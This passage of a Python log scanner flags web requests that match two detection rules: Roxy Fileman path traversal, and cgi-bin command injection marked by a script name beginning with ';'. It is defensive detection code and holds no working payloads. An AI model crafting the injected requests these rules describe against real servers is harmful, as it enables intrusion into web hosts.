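    """Path if it is a /cgi-bin/ request whose script name starts with ';', else None."""
    path = unquote(urlsplit(target).path)
    return path if path.startswith("/cgi-bin/;") else None

def scan_log(lines):
    """Return (source, rule, detail) for every line matching either pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        detail = roxy_traversal(m["target"])
        if detail:
            hits.append((m["src"], "roxyfileman-traversal", detail))
        elif (detail := cgi_injection(m["target"])):
            hits.append((m["src"], "cgi-bin-command-injection", detail))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```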
